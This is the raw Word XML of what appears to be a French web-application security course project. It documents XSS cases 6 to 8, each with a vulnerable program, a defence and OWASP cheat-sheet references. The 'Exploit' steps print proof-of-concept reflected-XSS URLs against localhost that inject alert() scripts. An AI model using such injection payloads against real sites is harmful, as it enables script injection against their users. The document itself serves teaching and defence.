        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F7660" w:rsidRDefault="005F7660" w:rsidP="005F7660">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId44" w:history="1">
        <w:r w:rsidRPr="007165B1">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>http://127.0.0.1/index.php?price="</w:t>
        </w:r>
        <w:r w:rsidRPr="007165B1">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>&gt;&lt;/a&gt;&lt;script&gt;alert(1)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F7660" w:rsidRDefault="005F7660" w:rsidP="005F7660">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1800"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F7660" w:rsidRDefault="005F7660" w:rsidP="005F7660">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Defense system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F7660" w:rsidRPr="00FE1DDD" w:rsidRDefault="005F7660" w:rsidP="005F7660">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4749047E" wp14:editId="0AC14327">
            <wp:extent cx="3533775" cy="657225"/>
            <wp:effectExtent l="0" t="0" r="9525" b="952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60" w:rsidRDefault="005F7660">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F7660" w:rsidRDefault="005F7660" w:rsidP="005F7660">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cross-site scripting (XSS) – </w:t>
      </w:r>
      <w:r w:rsidR="003C404C">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00AD5D3C">
        <w:t>allowed HTML but disallowed JS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Appelnotedebasdep"/>
        </w:rPr>
        <w:footnoteReference w:id="14"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F7660" w:rsidRDefault="005F7660" w:rsidP="005F7660">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerable program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F7660" w:rsidRDefault="00AD5D3C" w:rsidP="005F7660">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18C1291E" wp14:editId="234C662A">
            <wp:extent cx="5219700" cy="666750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60" w:rsidRDefault="005F7660" w:rsidP="005F7660">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F7660" w:rsidRDefault="005F7660" w:rsidP="005F7660">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId47" w:history="1">
        <w:r w:rsidR="00AD5D3C" w:rsidRPr="007165B1">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>http://127.0.0.1/index.php?price=&lt;script&gt;alert(1)</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F7660" w:rsidRDefault="005F7660" w:rsidP="005F7660">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1800"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F7660" w:rsidRDefault="005F7660" w:rsidP="005F7660">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Defense system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F7660" w:rsidRPr="00FE1DDD" w:rsidRDefault="00AD5D3C" w:rsidP="005F7660">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A6EA5E6" wp14:editId="624151F7">
            <wp:extent cx="4629150" cy="146685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3C" w:rsidRDefault="00AD5D3C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD5D3C" w:rsidRDefault="00AD5D3C" w:rsidP="00AD5D3C">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cross-site scripting (XSS) – </w:t>
      </w:r>
      <w:r w:rsidR="003C404C">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (in </w:t>
      </w:r>
      <w:r w:rsidR="00BB57C1">
        <w:t>JS URLs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Appelnotedebasdep"/>
        </w:rPr>
        <w:footnoteReference w:id="15"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD5D3C" w:rsidRDefault="00AD5D3C" w:rsidP="00AD5D3C">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerable program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD5D3C" w:rsidRDefault="0087618C" w:rsidP="00AD5D3C">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01D8D4CD" wp14:editId="6B08F38C">
            <wp:extent cx="5731510" cy="266700"/>
            <wp:effectExtent l="0" t="0" r="254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3C" w:rsidRDefault="00AD5D3C" w:rsidP="00AD5D3C">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD5D3C" w:rsidRDefault="00AD5D3C" w:rsidP="00AD5D3C">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId50" w:history="1">
        <w:r w:rsidR="00C17965" w:rsidRPr="007165B1">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>http://127.0.0.1/index.php?price=</w:t>
        </w:r>
        <w:r w:rsidR="00C17965" w:rsidRPr="007165B1">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>1);alert(</w:t>
        </w:r>
        <w:r w:rsidR="00C17965" w:rsidRPr="007165B1">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>"</w:t>
        </w:r>
        <w:r w:rsidR="00C17965" w:rsidRPr="007165B1">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>Code</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C17965">
        <w:t>Malveillant</w:t>
      </w:r>
      <w:r w:rsidR="00C17965" w:rsidRPr="00C17965">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="00C17965">
        <w:t>) ;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD5D3C" w:rsidRDefault="00AD5D3C" w:rsidP="00AD5D3C">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1800"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AD5D3C" w:rsidRDefault="00AD5D3C" w:rsidP="00AD5D3C">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Defense system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00486534" w:rsidRDefault="00486534" w:rsidP="00AD5D3C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B5A08F2" wp14:editId="62A7CF19">
            <wp:extent cx="5162550" cy="91440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6C" w:rsidRDefault="00486534">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C4F6C" w:rsidRDefault="009C4F6C" w:rsidP="009C4F6C">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cross-site scripting (XSS) – </w:t>
      </w:r>
      <w:r w:rsidR="003C404C">
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (in href) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Appelnotedebasdep"/>
        </w:rPr>
        <w:footnoteReference w:id="16"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C4F6C" w:rsidRDefault="009C4F6C" w:rsidP="009C4F6C">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerable program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C4F6C" w:rsidRDefault="009C4F6C" w:rsidP="009C4F6C">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="136A4807" wp14:editId="6F59FFD8">
            <wp:extent cx="5731510" cy="266700"/>
            <wp:effectExtent l="0" t="0" r="254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6C" w:rsidRDefault="009C4F6C" w:rsidP="009C4F6C">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C4F6C" w:rsidRDefault="009C4F6C" w:rsidP="009C4F6C">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:hyperlink r:id="rId52" w:history="1">
        <w:r w:rsidRPr="007165B1">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>http://127.0.0.1/index.php?price=1);alert("Code</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>Malveillant</w:t>
      </w:r>
      <w:r w:rsidRPr="00C17965">
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>) ;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C4F6C" w:rsidRDefault="009C4F6C" w:rsidP="009C4F6C">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1800"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009C4F6C" w:rsidRDefault="009C4F6C" w:rsidP="009C4F6C">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:r>
        <w:t>Defense system</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C4F6C" w:rsidRPr="00FE1DDD" w:rsidRDefault="009C4F6C" w:rsidP="009C4F6C">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AB8F05C" wp14:editId="53E9F308">
            <wp:extent cx="4629150" cy="1466850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6C" w:rsidRPr="00FE1DDD" w:rsidRDefault="009C4F6C" w:rsidP="009C4F6C"/>
    <w:p w:rsidR="005F7660" w:rsidRPr="00FE1DDD" w:rsidRDefault="005F7660" w:rsidP="005F7660">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F7660" w:rsidRPr="00FE1DDD" w:rsidRDefault="005F7660" w:rsidP="005F7660">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00461F20" w:rsidRDefault="00461F20" w:rsidP="005F7660">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00461F20" w:rsidSect="007E3488">
      <w:headerReference w:type="default" r:id="rId5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661" w:rsidRDefault="00EA4661">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA4661" w:rsidRDefault="00EA4661"/>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00EA4661" w:rsidRDefault="00EA4661">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA4661" w:rsidRDefault="00EA46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661" w:rsidRDefault="00EA4661">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA4661" w:rsidRDefault="00EA4661"/>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00EA4661" w:rsidRDefault="00EA4661">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA4661" w:rsidRDefault="00EA4661"/>
  </w:footnote>
  <w:footnote w:id="1">
    <w:p w:rsidR="00BD5BDF" w:rsidRDefault="00BD5BDF">
      <w:pPr>
        <w:pStyle w:val="Notedebasdepage"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Appelnotedebasdep"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> h</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5BDF">
        <w:t>ttps://cheatsheetseries.owasp.org/cheatsheets/Password_Storage_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="2">
    <w:p w:rsidR="00C63279" w:rsidRDefault="00C63279" w:rsidP="00C6327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CF5FA7" w:rsidRPr="00CF5FA7">
        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="3">
    <w:p w:rsidR="00CF5FA7" w:rsidRDefault="00CF5FA7" w:rsidP="00CF5FA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966DE2" w:rsidRPr="00966DE2">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="4">
    <w:p w:rsidR="00966DE2" w:rsidRDefault="00966DE2" w:rsidP="00966DE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66DE2">
        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="5">
    <w:p w:rsidR="001C1770" w:rsidRDefault="001C1770" w:rsidP="001C177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66DE2">
        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="6">
    <w:p w:rsidR="00C26A77" w:rsidRDefault="00C26A77" w:rsidP="00C26A7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66DE2">
        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="7">
    <w:p w:rsidR="00C26A77" w:rsidRDefault="00C26A77" w:rsidP="00C26A7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C26A77">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="8">
    <w:p w:rsidR="00461F20" w:rsidRDefault="00461F20" w:rsidP="00461F2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F20">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="9">
    <w:p w:rsidR="00884B9E" w:rsidRDefault="00884B9E" w:rsidP="00884B9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F20">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="10">
    <w:p w:rsidR="00461F20" w:rsidRDefault="00461F20" w:rsidP="00461F2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F20">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="11">
    <w:p w:rsidR="003C404C" w:rsidRDefault="003C404C" w:rsidP="003C404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F20">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="12">
    <w:p w:rsidR="005F7660" w:rsidRDefault="005F7660" w:rsidP="005F766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F20">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="13">
    <w:p w:rsidR="005F7660" w:rsidRDefault="005F7660" w:rsidP="005F766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F20">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="14">
    <w:p w:rsidR="005F7660" w:rsidRDefault="005F7660" w:rsidP="005F766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F20">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="15">
    <w:p w:rsidR="00AD5D3C" w:rsidRDefault="00AD5D3C" w:rsidP="00AD5D3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F20">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html</w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="16">
    <w:p w:rsidR="009C4F6C" w:rsidRDefault="009C4F6C" w:rsidP="009C4F6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F20">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html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EA4661">
    <w:pPr>
      <w:pStyle w:val="En-tte"/>
    </w:pPr>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:lang w:bidi="fr-FR"/>
        </w:rPr>
        <w:alias w:val="Titre courant"/>
        <w:tag w:val=""/>
        <w:id w:val="12739865"/>
        <w:placeholder>
          <w:docPart w:val="379F0579434749DC8DE4B00974D8506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92C58" w:rsidRPr="00592C58">
          <w:rPr>
            <w:lang w:bidi="fr-FR"/>
          </w:rPr>
          <w:t>Sécurité des applications Web - Projet</w:t>
        </w:r>
        <w:r w:rsidR="00592C58" w:rsidRPr="00592C58">
          <w:rPr>
            <w:lang w:bidi="fr-FR"/>
          </w:rPr>
          <w:tab/>
        </w:r>
      </w:sdtContent>
    </w:sdt>
    <w:r w:rsidR="005D3A03">
      <w:rPr>
        <w:rStyle w:val="lev"/>
        <w:lang w:bidi="fr-FR"/>
      </w:rPr>
      <w:ptab w:relativeTo="margin" w:alignment="right" w:leader="none"/>
    </w:r>
    <w:r w:rsidR="005D3A03">
      <w:rPr>
        <w:rStyle w:val="lev"/>
        <w:lang w:bidi="fr-FR"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidR="005D3A03">
      <w:rPr>
        <w:rStyle w:val="lev"/>
        <w:lang w:bidi="fr-FR"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
    </w:r>
    <w:r w:rsidR="005D3A03">
      <w:rPr>
        <w:rStyle w:val="lev"/>
        <w:lang w:bidi="fr-FR"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="000D3F41">
      <w:rPr>
        <w:rStyle w:val="lev"/>
        <w:noProof/>
        <w:lang w:bidi="fr-FR"/>
      </w:rPr>
      <w:t>8</w:t>
    </w:r>
    <w:r w:rsidR="005D3A03">
      <w:rPr>
        <w:rStyle w:val="lev"/>
        <w:noProof/>
        <w:lang w:bidi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um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epuc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136C85"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EB28E79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2C16E3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2EF6EE44"/>
    <w:lvl w:ilvl="0" w:tplc="54907EF6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65B0742"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="416A07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6D5D4F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B6C2D4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3"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="15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19"/>
    <w:rsid w:val="00053CEC"/>
    <w:rsid w:val="000621FB"/>
    <w:rsid w:val="00070047"/>
    <w:rsid w:val="00085616"/>
    <w:rsid w:val="000D3F41"/>
    <w:rsid w:val="00127BDE"/>
    <w:rsid w:val="001C1770"/>
    <w:rsid w:val="001C2C19"/>
    <w:rsid w:val="001D2DCB"/>
    <w:rsid w:val="001F1911"/>
    <w:rsid w:val="0028553F"/>
    <w:rsid w:val="002D0905"/>
    <w:rsid w:val="003228AF"/>
    <w:rsid w:val="00355DCA"/>
    <w:rsid w:val="00361FA4"/>
    <w:rsid w:val="003C404C"/>
    <w:rsid w:val="00453509"/>
    <w:rsid w:val="00461F20"/>
    <w:rsid w:val="00486534"/>
    <w:rsid w:val="004D5FD0"/>
    <w:rsid w:val="004E1E78"/>
    <w:rsid w:val="00511552"/>
    <w:rsid w:val="00551A02"/>
    <w:rsid w:val="005534FA"/>
    <w:rsid w:val="0057118A"/>
    <w:rsid w:val="00592C58"/>
    <w:rsid w:val="005D3A03"/>
    <w:rsid w:val="005E1C1B"/>
    <w:rsid w:val="005F7660"/>
    <w:rsid w:val="006C6FEA"/>
    <w:rsid w:val="00777337"/>
    <w:rsid w:val="007E128B"/>
    <w:rsid w:val="007E3488"/>
    <w:rsid w:val="008002C0"/>
    <w:rsid w:val="00830316"/>
    <w:rsid w:val="008504FA"/>
    <w:rsid w:val="0087618C"/>
    <w:rsid w:val="00883F08"/>
    <w:rsid w:val="00884A33"/>
    <w:rsid w:val="00884B9E"/>
    <w:rsid w:val="008B6286"/>
    <w:rsid w:val="008C0679"/>
    <w:rsid w:val="008C5323"/>
    <w:rsid w:val="009567FF"/>
    <w:rsid w:val="00966DE2"/>
    <w:rsid w:val="00990C16"/>
    <w:rsid w:val="009A6A3B"/>
    <w:rsid w:val="009C4F6C"/>
    <w:rsid w:val="00A16780"/>
    <w:rsid w:val="00A45E65"/>
    <w:rsid w:val="00A96587"/>
    <w:rsid w:val="00AA2BF2"/>
    <w:rsid w:val="00AC6F5E"/>
    <w:rsid w:val="00AD5D3C"/>
    <w:rsid w:val="00B726ED"/>
    <w:rsid w:val="00B823AA"/>
    <w:rsid w:val="00BA45DB"/>
    <w:rsid w:val="00BA7599"/>
    <w:rsid w:val="00BB57C1"/>
    <w:rsid w:val="00BD5BDF"/>
    <w:rsid w:val="00BF4184"/>
    <w:rsid w:val="00C0601E"/>
    <w:rsid w:val="00C17965"/>
    <w:rsid w:val="00C17F58"/>
    <w:rsid w:val="00C26A77"/>
    <w:rsid w:val="00C31D30"/>
    <w:rsid w:val="00C63279"/>
    <w:rsid w:val="00C956DC"/>
    <w:rsid w:val="00CD6E39"/>
    <w:rsid w:val="00CF5FA7"/>
    <w:rsid w:val="00CF6E91"/>
    <w:rsid w:val="00D45E21"/>
    <w:rsid w:val="00D85B68"/>
    <w:rsid w:val="00E6004D"/>
    <w:rsid w:val="00E81978"/>
    <w:rsid w:val="00E9591E"/>
    <w:rsid w:val="00E9798F"/>
    <w:rsid w:val="00EA4661"/>
    <w:rsid w:val="00EF7455"/>
    <w:rsid w:val="00F24CCB"/>
    <w:rsid w:val="00F379B7"/>
    <w:rsid w:val="00F525FA"/>
    <w:rsid w:val="00FA5D4F"/>
    <w:rsid w:val="00FE00FC"/>
    <w:rsid w:val="00FE1DDD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34FAE"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FB350752-8727-4CAC-AC60-6777E14D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79"/>
    <w:rPr>
      <w:kern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esection">
    <w:name w:val="Titre de sectio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-tte">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="En-tteCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:ind w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="En-tteCar">
    <w:name w:val="En-tête Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="En-tte"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:kern w:val="24"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aps/>
      <w:smallCaps w:val="0"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Textedelespacerserv">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="005D3A03"/>
    <w:rPr>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Sansinterligne">
    <w:name w:val="No Spacing"/>
    <w:aliases w:val="No Indent"/>
    <w:uiPriority w:val="3"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Titre1Car">
    <w:name w:val="Titre 1 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre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re2Car">
    <w:name w:val="Titre 2 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre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re">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Titre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reCar">
